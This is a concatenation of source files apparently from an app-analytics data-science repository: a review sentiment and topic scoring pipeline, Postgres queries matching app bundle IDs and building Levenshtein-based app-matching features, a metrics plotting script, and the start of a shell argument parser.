main_topics.remove(sentiment)
return main_topics, sentiment_topics
def _get_control_doc(seed_terms):
control_doc = seed_terms.keys()
control_doc.extend([item for sublist in seed_terms.values() for item in sublist])
control_doc = set(control_doc)
return control_doc
"""
PHASE 0
Clean temporary directory
"""
control = string.printable.replace('\t\n\r\x0b\x0c', '')
#sw = ['a']
sentence_detector = nltk.data.load('tokenizers/punkt/english.pickle')
"""
PHASE 1
Read reviews from csv
"""
def load_reviews(reviews_path):
index_df = pd.read_csv(reviews_path)
df = index_df[['id', 'title', 'text']]
return df, index_df
def preprocess_text(df, jobs=JOBS, mem_folder=MEM_FOLDER, parallel_chunk_size=PARALLEL_CHUNK_SIZE):
index = df.index.values
chunks_index = [index[x:x+parallel_chunk_size] for x in xrange(0, len(index), parallel_chunk_size)]
def producer():
for chunk in chunks_index:
yield (chunk, df.loc[chunk])
D = delayed(_process_chunk)
a = [D(i[0], i[1]) for i in producer()]
os.system('taskset -p 0xffffffff %d' % os.getpid())
Parallel(n_jobs=jobs, verbose=5, pre_dispatch=jobs, temp_folder=mem_folder)(a)
def _process_chunk(chunk, df):
"""
Cleat and preprocess text, convert to bag of words, generate DataFrame
@param chunk: index of chunk in original DataFrame
@param df: pandas DataFrame
@return: clean DataFrame
"""
df['text'] = df.apply(lambda x: '{}. {}'.format(x['title'], x['text']), axis=1)
del df['title']
_ = gc.collect()
df['text'] = df['text'].apply(_clean_text)
df['sentence'] = df['text'].apply(_detect_sentences)
del df['text']
df = _sentence_to_df(df)
df['review'] = df['review'].apply(_to_bag_of_words)
df['ngrams'] = df['review'].apply(lambda x: x[1])
df['total_ngrams'] = df['review'].apply(lambda x: x[2])
df = df[df['total_ngrams'] > 0]
df['review'] = df['review'].apply(lambda x: x[0])
cPickle.dump(df, open('{}/chunk_{}-{}.pk'.format(TMP_DIR, chunk[0], chunk[len(chunk)-1]), "wb"))
def _clean_text(x, contractions=CONTRACTIONS):
"""
Clean text by replacing contractions and illegal characters
@param x: String to clean
@return: Clean string
"""
x = x.lower()
x = ''.join([c for c in x if c in control])
for k, v in contractions.iteritems():
x = x.replace(k, v)
return x
def _detect_sentences(x):
"""
Split string into sentences
@param x: String to split
@return: List of sentences
"""
sentences = sentence_detector.tokenize(x)
result = []
for sentence in sentences:
s = re.split('[,:;]+', sentence)
result.extend(s)
return result
def _sentence_to_df(df):
"""
Split a list in a pandas row into a row per sentence.
@param df: Dataframe containing list of sentences.
@return: unfolded DataFrame
"""
r = []
for g in df.iterrows():
ndf = pd.DataFrame(g[1]['sentence'])
ndf['id'] = g[1]['id']
r.append(ndf)
df = pd.concat(r)
del r
df['review'] = df[0]
del df[0]
_ = gc.collect()
return df
def _to_bag_of_words(x, stop_words):
"""
Convert string to bag of words (tokenize)
@param x: String to be tokenized
@return: bag of words list, ngrams list, total ngrams
"""
pattern = re.compile("[_\W]+")
x = wordpunct_tokenize(x)
x = [pattern.sub('', w) for w in x]
x = [w for w in x if not w in stop_words]
x = [w for w in x if len(w) > 2]
n_tokens = len(x)
n_grams = []
bow = []
local_min = MIN_N if MIN_N < n_tokens else n_tokens
for i in xrange(n_tokens):
for j in xrange(i+local_min, min(n_tokens, i+MAX_N)+1):
n = x[i:j]
n_grams.append(n)
bow.append(DELIMITER.join(n))
ngram_count = len(bow)
return bow, n_grams, ngram_count
def generate_dictionary(df, control_doc, seed_terms=SEED_TERMS, tmp_dir=TMP_DIR):
dictionary = None
first = True
chunk_files = []
for f in listdir(tmp_dir):
if f.startswith('chunk') and f.endswith('.pk'):
path = join(tmp_dir, f)
if isfile(path):
chunk_files.append(path)
if PHASE[3]:
df = cPickle.load(open(path, "rb"))
if first:
first = False
dictionary = corpora.Dictionary(list(df['review']))
else:
dictionary.add_documents(list(df['review']))
dictionary.filter_extremes(no_below=4, no_above=1.0, keep_n=None)
dictionary.compactify()
print 'len after filter: {}'.format(len(dictionary))
dictionary.add_documents([control_doc])
dictionary.save('{}/dictionary.dict'.format(DATA_DIR)) # store the dictionary, for future reference
print 'initial len: {}'.format(len(dictionary))
"""
Here we filter out low frequency ngrams from the dictionary.
If the ngram appears less than no_below times we drop it.
"""
total_frequencies = {}
for chunk_file in chunk_files:
df = cPickle.load(open(chunk_file, "rb"))
for doc in list(df['review']):
bow_dict = dictionary.doc2bow(doc)
for w in bow_dict:
if w[0] in total_frequencies:
total_frequencies[w[0]] += w[1]
else:
total_frequencies[w[0]] = w[1]
cPickle.dump(total_frequencies, open('{}/total_frequencies.pk'.format(TMP_DIR), "wb"))
seed_ids = {}
for topic in seed_terms:
seed_ids[topic] = []
for dict_id in dictionary:
dict_term = dictionary[dict_id].split(' ')
for topic, seeds in seed_terms.iteritems():
for seed in seeds:
if seed in dict_term:
seed_ids[topic].append(dict_id)
for topic in seed_terms:
seed_ids[topic] = set(seed_ids[topic])
new_positive = []
for dict_id in seed_ids['positive']:
dict_term = dictionary[dict_id].split(' ')
if not 'not' in dict_term and not 'no' in dict_term:
new_positive.append(dict_id)
seed_ids['positive'] = copy(new_positive)
cPickle.dump(seed_ids, open('{}/seed_ids.pk'.format(TMP_DIR), "wb"))
return df
def load_dictionary():
dictionary = corpora.Dictionary.load('{}/dictionary.dict'.format(DATA_DIR))
total_frequencies = cPickle.load(open('{}/total_frequencies.pk'.format(TMP_DIR), "rb"))
seed_ids = cPickle.load(open('{}/seed_ids.pk'.format(TMP_DIR), "rb"))
return dictionary, total_frequencies, seed_ids
def _clean_df(chunk_file, dictionary):
"""
Clean dataframe by converting reviews to gensim bag of words.
If the review ends as an empty bag of words we filter it out.
This happens when the review is compossed of low frequency ngrams, genreally giberish.
@param chunk_file: DataFrame
@return: pickled clean dataframe to disk
"""
df = cPickle.load(open(chunk_file, "rb"))
df['freq'] = df['review'].apply(dictionary.doc2bow)
df['total_ngrams'] = df['freq'].apply(lambda x: np.array(x).sum(axis=0))
df['total_ngrams_a'] = df['total_ngrams'].apply(type)
df = df[df['total_ngrams_a'] == np.ndarray]
del df['total_ngrams_a']
_ = gc.collect()
df['total_ngrams'] = df['total_ngrams'].apply(lambda x: x[1])
df = df[df['total_ngrams'] > 0]
df['ngrams'] = df['freq'].apply(lambda x: set([a[0] for a in x]))
cPickle.dump(df, open(chunk_file, "wb"))
gc.collect()
"""
PHASE 4
Clean DataFrame
Generate ngrams
"""
def clean_dataframe(chunk_files):
D = delayed(_clean_df)
a = [D(i) for i in chunk_files]
os.system('taskset -p 0xffffffff %d' % os.getpid())
Parallel(n_jobs=JOBS, verbose=5, pre_dispatch=JOBS, temp_folder=MEM_FOLDER)(a)
def _make_topic_corpus(chunk_file, seed_ids, dictionary, seed_terms=SEED_TERMS):
"""
Generate corpus for each topic, if the review contains a seed word it is considered part of the topic
@param chunk_file: Dataframe to analyze
@return: dictionary with all the dataframes belonging to topic
"""
df = cPickle.load(open(chunk_file, "rb"))
corpus = {}
def seed_in_bow(x):
for w in x:
if w in seed_ids[topic]:
return True
return False
for topic in seed_terms:
reviews_filter = df['ngrams'].apply(seed_in_bow)
corpus_df = pd.DataFrame(dictionary.doc2bow(itertools.chain(*df[reviews_filter]['review'])))
corpus_df.rename(columns={0: 'topic_id', 1: 'frequency'}, inplace=True)
corpus[topic] = corpus_df.copy()
return corpus
def create_topic_corpus(chunk_files, seed_terms=SEED_TERMS):
D = delayed(_make_topic_corpus)
a = [D(i) for i in chunk_files]
os.system('taskset -p 0xffffffff %d' % os.getpid())
result = Parallel(n_jobs=JOBS, verbose=5, pre_dispatch=JOBS, temp_folder=MEM_FOLDER)(a)
topic_corpus = {}
first = {}
for topic in seed_terms:
first[topic] = True
for r in result:
for topic in seed_terms:
if first[topic]:
topic_corpus[topic] = r[topic].copy()
first[topic] = False
else:
topic_corpus[topic] = pd.concat([topic_corpus[topic], r[topic]])
topic_corpus[topic] = topic_corpus[topic].groupby('topic_id').sum().reset_index()
del result
cPickle.dump(topic_corpus, open('{}/topic_corpus.pk'.format(TMP_DIR), "wb"))
return topic_corpus
def load_topic_corpus(tmp_dir=TMP_DIR):
topic_corpus = cPickle.load(open('{}/topic_corpus.pk'.format(tmp_dir), "rb"))
return topic_corpus
"""
PHASE 6
Get weights for each ngram for each topic
Put everytihng into a dictionary
Save cPickle or load from cPickle
"""
def create_topic_weights(total_frequencies, topic_corpus, dictionary, data_dir=DATA_DIR, tmp_dir=TMP_DIR):
frequency_file = open('{}/word_fequencies.csv'.format(data_dir), 'w')
frequency_file.write('topic,term,frequency_in_topic,total_frequency,weight\n')
len_total_frequencies = len(total_frequencies)
topic_weights = {}
for topic in topic_corpus:
topic_weights[topic] = {}
for w in topic_corpus[topic].iterrows():
wid = w[1]['topic_id']
frequency = w[1]['frequency']
if wid < len_total_frequencies:
weight = float(frequency)/total_frequencies[wid]
frequency_line = '{},{},{},{},{}\n'.format(topic, dictionary[wid], frequency,
total_frequencies[wid], weight)
frequency_file.write(frequency_line)
topic_weights[topic][wid] = weight
frequency_file.close()
cPickle.dump(topic_weights, open('{}/topic_weights.pk'.format(tmp_dir), "wb"))
return topic_weights
def load_topic_weights(tmp_dir=TMP_DIR):
topic_weights = cPickle.load(open('{}/topic_weights.pk'.format(tmp_dir), "rb"))
return topic_weights
"""
PHASE 7
Filter out ngrams with low weight.
Now weight_threshold is 0, we are not filtering ngrams.
"""
def filter_low_weight_ngrams(topic_weights, seed_terms=SEED_TERMS):
topic_weights_original = deepcopy(topic_weights)
weight_threshold = 0
if weight_threshold > 0:
topic_weights = deepcopy(topic_weights_original)
for test_topic in seed_terms:
for w in topic_weights[test_topic].keys():
if topic_weights[test_topic][w] < weight_threshold:
del topic_weights[test_topic][w]
_ = gc.collect()
print test_topic, len(topic_weights[test_topic]), len(topic_weights_original[test_topic])
return topic_weights
def _get_scores(chunk_file, topic_weights, main_topics):
"""
Generate scores per topic for each review.
The score is an absolute value we will use to decide if a review belongs to a topic or not.
@param chunk_file: Dataframe to process
@return:
"""
df = cPickle.load(open(chunk_file, "rb"))
df = df.fillna(0.0)
df = df[df['total_ngrams'] > 0]
scores = {}
for topic in topic_weights:
scores[topic] = []
for idx, row in df.iterrows():
for topic in topic_weights:
score = 0.0
for w in row['freq']:
if w[0] in topic_weights[topic]:
score += topic_weights[topic][w[0]]*w[1]
score /= row['total_ngrams']
scores[topic].append(score)
for topic in topic_weights:
df[topic] = scores[topic]
del df['total_ngrams']
df = df[df[main_topics].sum(axis=1) > 0]
def normalize(x):
sentiment_sum = x[['positive', 'negative']].sum()
if sentiment_sum > 0:
return ((x['positive'] / sentiment_sum) * 2.0) - 1.0
else:
return 0.0
df = df.fillna(0.0)
df['positive'] = df.apply(normalize, axis=1)
del df['negative']
for topic in main_topics:
sentiment_topic = 'sentiment_{}'.format(topic)
df[sentiment_topic] = df[topic] * df['positive']
df = df.fillna(0.0)
df = df.groupby('id').mean().reset_index()
df.to_csv('{}.csv'.format(chunk_file), index=False)
"""
PHASE 8
Assign a score per topic to each review
"""
def generate_review_score(chunk_files):
D = delayed(_get_scores)
a = [D(i) for i in chunk_files]
os.system('taskset -p 0xffffffff %d' % os.getpid())
Parallel(n_jobs=JOBS, verbose=5, pre_dispatch=JOBS, temp_folder=MEM_FOLDER)(a)
def _load_df(chunk_file_name, index_df):
"""
Load previosuly built dataframe from csv
@param chunk_file_name: name of the file to load
@return: loaded Dataframe
"""
df = pd.read_csv('{}.csv'.format(chunk_file_name))
df = df.merge(index_df, on='id')
del df['title']
del df['text']
#del df['id']
del df['reviewer']
df['month'] = df['date'].apply(lambda x: x[:7])
del df['date']
return df
def _set_review_as_topic(x):
"""
If the review score for a given topic is higher than score_treshold it is considered part of that topic.
score_treshold of 1.0 equals average of all reviews for each topic.
@param x: list of scores
@return: list of 0 or 1, if 1 review belongs to topic
"""
score_treshold = 1.5
result = []
for i in x:
if i >= score_treshold:
result.append(1.)
else:
result.append(0.)
return result
def _normalize_sentiment(x):
"""
Accesory function to convert sentiment from -1 to 1 to 0 to 1
@param x: value to normalize
@return: normalized value
"""
result = np.nan
if x > 0:
result = 1.
elif x < 0:
result = 0.
return result
def _apply_topic_and_sentiment(df, main_topics):
"""
Generate topic and sentiment series based on scores for each review
@param df: Dataframe with topic scores and reviews
@return: Dataframe with classified reivews
"""
df = df.copy()
for col in main_topics:
col_mean = df[col].mean()
df[col] /= col_mean
df[main_topics] = df[main_topics].apply(_set_review_as_topic, axis=1)
for col in main_topics:
sentiment_col = 'sentiment_{}'.format(col)
df[sentiment_col] = df[col] * df[sentiment_col]
df[sentiment_col] = df[sentiment_col].apply(_normalize_sentiment)
return df
def _get_max_version_mean(df, groupby_cols):
"""
Accesory function to get scores mean
@param df: dataframe to get mean of
@return: mean of dataframe
"""
del df['id']
del df['positive']
df = df.groupby(groupby_cols).mean().reset_index()
return df
"""
PHASE 9
Classify scored reviews in topics.
Filter out unclassified reviews.
Aggregate all scores per month-app-version.
Write to result to csv file.
"""
def classify_reviews(chunk_files, index_df):
print '9: Aggregating scores per app-month'
groupby_cols = ['app_id', 'month', 'version']
if not PHASE[1]:
index_df = pd.read_csv(reviews_path)
D = delayed(_load_df)
a = [D(i, index_df) for i in chunk_files]
os.system('taskset -p 0xffffffff %d' % os.getpid())
df = pd.concat(Parallel(n_jobs=JOBS, verbose=5, pre_dispatch=JOBS, temp_folder=MEM_FOLDER)(a))
size_df = df.groupby(groupby_cols).size().reset_index()
size_df['count'] = size_df[0]
size_df = size_df[size_df['count'] >= 100]
del size_df[0]
def producer():
for n, g in df.groupby(['month']):
yield g
D = delayed(_apply_topic_and_sentiment)
a = [D(i) for i in producer()]
os.system('taskset -p 0xffffffff %d' % os.getpid())
df = pd.concat(Parallel(n_jobs=JOBS, verbose=5, pre_dispatch=JOBS, temp_folder=MEM_FOLDER)(a))
np.random.seed(42)
rows = random.sample(df.index, 300)
pd.merge(df, index_df, on=['app_id', 'id', 'version']).to_csv('{}/full_reviews.csv'.format(DATA_DIR), index=False)
def producer():
for n, g in df.groupby(groupby_cols):
yield g
D = delayed(_get_max_version_mean)
a = [D(i, groupby_cols) for i in producer()]
os.system('taskset -p 0xffffffff %d' % os.getpid())
df = pd.concat(Parallel(n_jobs=JOBS, verbose=5, pre_dispatch=JOBS, temp_folder=MEM_FOLDER)(a))
df['addiction_a'] = df['addiction'] * df['sentiment_addiction']
df['sentiment_addiction_a'] = 1.
df['crashes_a'] = df['crashes'] * (1.-df['sentiment_crashes'])
df['sentiment_crashes_a'] = 0.
df['value_a'] = df['value'] * df['sentiment_value']
df['sentiment_value_a'] = 1.
df['virality_a'] = df['virality'] * df['sentiment_virality']
df['sentiment_virality_a'] = 1.
df['usability_a'] = df['usability'] * df['sentiment_usability']
df['sentiment_usability_a'] = 1.
non_indexable = ['app_id', 'month', 'app_name', 'version']
indexable = df.columns
indexable = [x for x in indexable if x not in non_indexable]
result = []
df = df.merge(size_df, on=groupby_cols)
for n,g in df.groupby(['month']):
for col in indexable:
indexed_col = 'indexed_{}'.format(col)
g[indexed_col] = g[col] / g[col].mean()
result.append(g)
df = pd.concat(result)
df.to_csv('{}/sentiment_per_app.csv'.format(DATA_DIR), index=False)
print '9: Aggregating scores per app-month - done'
<file_sep>/downloads_retention/match_bundleId.py
import psycopg2
import sys
import pandas as pd
def match_bundleId(_data_):
# iOS
try:
conn_string = "host='ds-db-1.appannie.org' dbname='aa' user='syan' password='<PASSWORD>'"
bundle_id = list(_data_[_data_['Device Type'].isin(['iPhone', 'iPad'])]['bundle_id'].\
apply(str).unique())
bundle_id = ','.join(bundle_id)
query = '''
SELECT Y.id as app_id, X.name as category_name, Y.name as app_name
from
webanalytics_category X
inner join
(
SELECT * FROM aa_app
where id IN ({})
) Y
on X.id = Y.category_id
'''.format(bundle_id)
mapping_table = pd.read_sql(query, con=psycopg2.connect(conn_string))
print 'iOS', _data_[_data_['Device Type']=='iPhone'].shape
_dat_iOS = pd.merge(_data_, mapping_table, left_on=['bundle_id'], right_on=['app_id'])
print _dat_iOS.shape
except:
_dat_iOS = pd.DataFrame()
# Android
conn_string = "host='ds-db-1.appannie.org' dbname='aa_android' user='syan' password='<PASSWORD>'"
bundle_id = list(_data_[_data_['Device Type'].isin(['Android Mobile', 'Android Tablet'])]['bundle_id'].\
apply(str).unique())
bundle_id = ','.join(bundle_id)
query = '''
SELECT Y.id as bundle_id, Y.class as app_id, X.name as category_name, Y.name as app_name
from
category X
inner join
(
SELECT * FROM app
where id IN ({})
) Y
on X.id = Y.category_id
'''.format(bundle_id)
mapping_table = pd.read_sql(query, con=psycopg2.connect(conn_string))
print 'Android', _data_[_data_['Device Type']=='Android Mobile'].shape
_dat_Android = pd.merge(_data_, mapping_table, left_on=['bundle_id'], right_on=['bundle_id'])
print _dat_Android.shape
new_data = _dat_Android.append(_dat_iOS, ignore_index=True)
return new_data
if __name__ == '__main__':
temp = pd.read_csv('./dump_rincon.csv')
match_bundleId(temp).to_csv('./rincon_inband.csv',index=False)
<file_sep>/plotting/plot.py
'''
Created on Apr 12, 2013
@author: perezrafael
'''
import pandas as pd
import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import itertools
import os
## This is the dir where we store the plots
USE_COLOR_MAP = True
if __name__ == '__main__':
## These are the files with the quality metrics we want to compare, key is model name
#input_files = {'universals_daily_2013-01':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily_universals/2013-01/result.csv',
# 'original_daily_2013-01':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily/2013-01/result.csv',
# 'universals_daily_2013-02':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily_universals/2013-02/result.csv',
# 'original_daily_2013-02':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily/2013-02/result.csv'}
month = '2013-01'
platform = 'ios'
PLOTS_DIR = '/Users/perezrafael/appannie/data_science/plotting/plots/%s_%s_universals'%(platform, month)
#input_files = {'original':'/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_original/%s/result.csv'%(platform, month),
# 'dynamic':'/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_dynamic/%s/result.csv'%(platform, month),
# 'preview':'/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_preview/%s/result.csv'%(platform, month)}
input_files = {'webui':'/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_dynamic/%s/result.csv'%(platform, month),
'train_single_day_data':'/Users/perezrafael/appannie/data_science/evaluation/data/%s_daily/%s/result.csv'%(platform, month),
'universal_model_2013-01':'/Users/perezrafael/appannie/data_science/evaluation/data/%s_universals_using_2013-01/%s/result.csv'%(platform, month),
'universal_model_2013-02':'/Users/perezrafael/appannie/data_science/evaluation/data/%s_universals_using_2013-02/%s/result.csv'%(platform, month)}
color_map = {'webui':'g',
'train_single_day_data':'c',
'universal_model_2013-01':'r',
'universal_model_2013-02':'b'}
if not os.path.exists(PLOTS_DIR):
os.makedirs(PLOTS_DIR)
metrics = {}
models = sorted(input_files.keys())
for model in input_files:
metrics[model] = pd.read_csv(input_files[model])
metrics[model]['model'] = model
#models.append(model)
metrics = pd.concat(metrics)
metrics.sort(['model', 'period', 'country', 'unit'], inplace=True)
columns = metrics.columns
total_models=len(models)
units = metrics['unit'].drop_duplicates()
periods = metrics['period'].drop_duplicates()
countries = metrics['country'].drop_duplicates()
width = 0.15
for column in columns:
for period in periods:
for unit in units:
error = False
colors = itertools.cycle(['b', 'g', 'r', 'c', 'm', 'y', 'k'])
plt.clf()
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_title('%s\n%s - %s'%(column, unit, period))
ax.set_color_cycle(['r', 'g', 'b', 'c'])
ind = np.arange(len(countries))
indb = ind
rects=[]
for model in models:
if USE_COLOR_MAP:
color = color_map[model]
else:
color = colors.next()
values = metrics[(metrics['model']==model) & (metrics['unit']==unit)][column].values
try:
rects.append(ax.bar(indb, values, width, color=color))
except:
error = True
indb = indb+width
if error:
continue
#plt.ylim(0, metrics[column].max()*1.5)
ax.set_xticks(ind+width)
ax.set_xticklabels(countries)
ax.legend(rects, models, loc='best')
plt.savefig('%s/%s_%s_%s.png'%(PLOTS_DIR, column, unit, period))
<file_sep>/exact-matching-improvement/lib/queries.py
import config as cf
db_links = {
'ios_link': """
select
dblink_connect('ios_link','dbname=aa host={host_name} user={user_name} password={password}');
""".format(host_name=cf.host, user_name=cf.user, password=cf.password),
'android_link': """
select dblink_connect('android_link','dbname=aa_android host={host_name} user={user_name} password={password}');
""".format(host_name=cf.host, user_name=cf.user, password=cf.password)
}
ios_queries = {
'drop_ios_matches': """
drop table if exists ios_matches;
""",
'create_ios_matches': """
create temporary table ios_matches
as
select
ios_match.market,
ios_match.universal_app_id,
ios_match.app_id
from
dblink('ios_link',
' select
universal_app_id,
app_id,
market
from
dna_universal_app_mapping
where
market = $$ios$$
') as ios_match(universal_app_id bigint, app_id bigint, market varchar);
alter table ios_matches add primary key (app_id);
""",
'drop_ios_apps': """
drop table if exists ios_apps;
""",
'create_ios_apps': """
create temporary table ios_apps
as
select
ios_app.id,
ios_app.app_name,
ios_app.company,
ios_app.icon_url
from
dblink('ios_link',
'select
id,
name,
company,
artwork_url
from
aa_app
') as ios_app(id bigint, app_name varchar, company varchar, icon_url varchar);
alter table ios_apps add primary key (id);
""",
'select_ios_features': """
select
*
from
ios_features;
""",
'create_ios_features': """
drop table if exists ios_features;
create table ios_features(
app_pk serial primary key,
market varchar(30),
universal_app_id bigint,
app_id bigint,
app_name varchar,
company varchar,
icon_url varchar);
insert into ios_features(market, universal_app_id, app_id, app_name, company, icon_url)
select
im.market,
im.universal_app_id,
im.app_id,
ia.app_name,
ia.company,
ia.icon_url
from
ios_apps ia
join ios_matches im on im.app_id = ia.id;
"""
}
android_queries = {
'drop_android_matches':
"""drop table if exists android_matches;
""",
'create_android_matches':"""
create temporary table android_matches
as
select
android_match.market,
android_match.universal_app_id,
android_match.app_id
from
dblink('ios_link',
'select
universal_app_id,
app_id,
market
from
dna_universal_app_mapping
where
market = $$gp$$
') as android_match(universal_app_id bigint, app_id bigint, market varchar);
alter table android_matches add primary key (app_id);
""",
'drop_android_apps': """
drop table if exists android_apps;
""",
'create_android_apps': """
create temporary table android_apps
as
select
android_app.id,
android_app.app_name,
android_app.company,
android_app.icon_url
from
dblink('android_link',
' select
id,
name,
company,
icon_url
from
app
') as android_app(id bigint, app_name varchar, company varchar, icon_url varchar);
alter table android_apps add primary key (id);
""",
'create_android_features': """
drop table if exists android_features;
create table android_features(
app_pk serial primary key,
market varchar(30),
universal_app_id bigint,
app_id bigint,
app_name varchar,
company varchar,
icon_url varchar);
insert into android_features(market, universal_app_id, app_id, app_name, company, icon_url)
select
am.market,
am.universal_app_id,
am.app_id,
aa.app_name,
aa.company,
aa.icon_url
from
android_apps aa
join android_matches am on am.app_id = aa.id;
""",
'select_android_features': """
select
*
from
android_features;
"""
}
general_queries = {
'select_dna_excluded_terms': """
select
dna_excluded.content
from
dblink(
'ios_link',
'select
content
from
dna_excluded_terms
where type ={type};') as dna_excluded(content varchar);
""",
'create_processed_dna_feature_table': """
create table processed_feature_{new_feature}(
app_pk integer,
market varchar,
universal_app_id bigint,
app_id bigint,
{new_feature} {feature_type},
primary key (app_pk));
""",
'insert_processed_dna_feature': """
insert into processed_feature_{new_feature}(
app_pk,
market,
universal_app_id,
app_id,
{new_feature})
values(
%(app_pk)s,
%(market)s,
%(universal_app_id)s,
%(app_id)s,
%({new_feature})s)
""",
'drop_processed_dna_feature': """
drop table if exists processed_feature_{new_feature};
""",
'create_all_features': """
drop table if exists all_features;
create table all_features(
app_pk serial primary key,
market varchar(30),
universal_app_id bigint,
app_id bigint,
app_name varchar,
company varchar,
icon_url varchar);
insert into all_features(market, universal_app_id, app_id, app_name, company, icon_url)
select
am.market,
am.universal_app_id,
am.app_id,
aa.app_name,
aa.company,
aa.icon_url
from
android_apps aa
join android_matches am on am.app_id = aa.id;
insert into all_features(market, universal_app_id, app_id, app_name, company, icon_url)
select
im.market,
im.universal_app_id,
im.app_id,
ia.app_name,
ia.company,
ia.icon_url
from
ios_apps ia
join ios_matches im on im.app_id = ia.id;
""",
'select_all_features': """
select
*
from
all_features;
""",
'select_icon_input': """
select app_id, market, icon_url, app_name as name from all_features;
"""
}
metric_queries = {
'create_dna_levenshtein_metric_table': """
drop table if exists dna_metric_levenshtein_{feature_name};
create table dna_metric_levenshtein_{feature_name}(
serial_id serial primary key,
app_pk_from integer,
app_pk_to integer,
levenshtein_ratio real,
is_a_match boolean);
insert into dna_metric_levenshtein_{feature_name} (app_pk_from, app_pk_to, levenshtein_ratio, is_a_match)
select
a.app_pk as app_pk_from,
b.app_pk as app_pk_to,
levenshtein_ratio(a.{feature_name}, b.{feature_name}) as levenshtein_ratio,
case when a.universal_app_id = b.universal_app_id then True else False end as is_a_match
from
processed_feature_{feature_name} a, processed_feature_{feature_name} b
where a.app_pk > b.app_pk;
drop index from_index_{feature_name}_index;
drop index to_index_{feature_name}_index;
drop index levenshtein_match_{feature_name}_index;
create index from_index_{feature_name}_index on dna_metric_levenshtein_{feature_name} (app_pk_from);
create index to_index_{feature_name}_index on dna_metric_levenshtein_{feature_name} (app_pk_to);
create index levenshtein_match_{feature_name}_index on dna_metric_levenshtein_{feature_name} (levenshtein_ratio,is_a_match);
""",
'create_dna_extended_levenshtein_metric_table':"""
drop table if exists dna_metric_levenshtein_{feature_name}_extended;
create table dna_metric_levenshtein_{feature_name}_extended(
serial_id serial primary key,
app_pk_from integer,
app_pk_to integer,
levenshtein_ratio real,
is_a_match boolean,
{original_feature_name}_from varchar,
{original_feature_name}_to varchar,
{feature_name}_from varchar,
{feature_name}_to varchar);
insert into dna_metric_levenshtein_{feature_name}_extended (app_pk_from, app_pk_to, levenshtein_ratio, is_a_match, {original_feature_name}_from, {original_feature_name}_to, {feature_name}_from, {feature_name}_to)
select
t.*,
f_1.{original_feature_name} as {original_feature_name}_from,
f_2.{original_feature_name} as {original_feature_name}_to,
p_1.{feature_name} as {feature_name}_from,
p_2.{feature_name} as {feature_name}_to
from
dna_metric_levenshtein_{feature_name} t, all_features f_1, all_features f_2,
processed_feature_{feature_name} p_1, processed_feature_{feature_name} p_2
where
t.app_pk_from = f_1.app_pk
and t.app_pk_to = f_2.app_pk
and t.app_pk_from = p_1.app_pk
and t.app_pk_to = p_2.app_pk;
drop index from_index_{feature_name}_index_extended;
drop index to_index_{feature_name}_index_extended;
drop index levenshtein_match_{feature_name}_index_extended;
create index from_index_{feature_name}_index_extended on dna_metric_levenshtein_{feature_name}_extended (app_pk_from);
create index to_index_{feature_name}_index_extended on dna_metric_levenshtein_{feature_name}_extended (app_pk_to);
create index levenshtein_match_{feature_name}_index_extended on dna_metric_levenshtein_{feature_name}_extended (levenshtein_ratio,is_a_match);
""",
'select_dna_metric_levenshtein_with_citerion': """
select
*
from
dna_metric_levenshtein_{feature_name}
where is_a_match = {match_criterion};
""",
'select_dna_metric_levenshtein': """
select
*
from
dna_metric_levenshtein_{feature_name};
""",
'select_dna_metric_levenshtein_extended': """
select
*
from
dna_metric_levenshtein_{feature_name}_extended
where
levenshtein_ratio >= {lower_bound} and levenshtein_ratio <= {upper_bound}
and is_a_match = {criterion};
""",
'select_dna_metric_levenshtein_sample_app': """
drop table if exists temp_random_select_from_features;
create temp table temp_random_select_from_features (like all_features including defaults);
insert into temp_random_select_from_features
select
*
from
all_features order by random() limit {n_apps};
select
m.*
from
temp_random_select_from_features f, dna_metric_levenshtein_{feature_name} m
where f.app_pk = m.app_pk_from;
""",
'select_dna_sample': """
select
*
from {table_name}
where
serial_id in (select round(random() * 21e6)::integer as serial_id from generate_series(1, ({num_samples} + sqrt({num_samples})::integer)) group by serial_id)
limit {num_samples};
""",
'select_confusion_matrix_real': """
select
s.label,
s.predicted,
count(s.*)
from
(
select
case when t.{feature_name} >= {threshold_value} then 1 else 0 end as predicted,
case when t.{label} = True then 1 else 0 end as label
from
(
select {feature_name}, {label} from {table}
) t
) s
group by s.label, s.predicted;
""",
'select_confusion_matrix_bool': """
select
s.label,
s.predicted,
count(s.*)
from
(
select
case when t.{feature_name} is {threshold_value} then 1 else 0 end as predicted,
case when t.{label} = True then 1 else 0 end as label
from
(
select {feature_name}, {label} from {table}
) t
) s
group by s.label, s.predicted;"""
}
function_queries = {
'create_function_levenshtein_ratio': """
create or replace function
levenshtein_ratio(a_string varchar, b_string varchar) returns real as $$
declare result real;
declare a_string_length real;
declare b_string_length real;
begin
a_string_length = char_length(a_string);
b_string_length = char_length(b_string);
if (a_string_length > 0 and b_string_length > 0) then
result = 1 - (levenshtein(a_string, b_string) / greatest(a_string_length, b_string_length));
else
result = 0;
end if ;
return result;
end
$$ language plpgsql;
"""
}
<file_sep>/old_investigations/generate_monthly_weights.sh
#!/bin/sh
aa_dir="/Users/perezrafael/appannie/aa"
data_science_dir="/Users/perezrafael/appannie/data_science"
function usage()
{
echo "Calculate estimates normally, then by scaling"
echo ""
echo "./generate_monthly_weights.sh"
echo "\t-h --help"
echo "\t-m --month"
echo "\t-p --period"
echo "\t-c --country-id"
echo "\t-n --country-name"
echo "\t-i --category-id"
echo "\taa_dir=$aa_dir"
echo "\tdata_science_dir=$data_science_dir"
echo ""
}
while [ "$1" != "" ]; do
PARAM=`echo $1 | awk -F= '{print $1}'`
VALUE=`echo $1 | awk -F= '{print $2}'`
case $PARAM in
-h | --help)
usage
exit
;;
-m | --month)
month=$VALUE
;;
-p | --period)
period=$VALUE
;;
-c | --country-id)
country_id=$VALUE
;;
-n | --country-name)
country_name=$VALUE
;;
-i | --category-id)
category_id=$VALUE
;;
*)
echo "ERROR: unknown parameter \"$PARAM\""
usage
exit 1
;;
esac
shift
done
downloads="./data/${country_name}_${period}_Downloads.csv"
usd="./data/${country_name}_${period}_USD.csv"
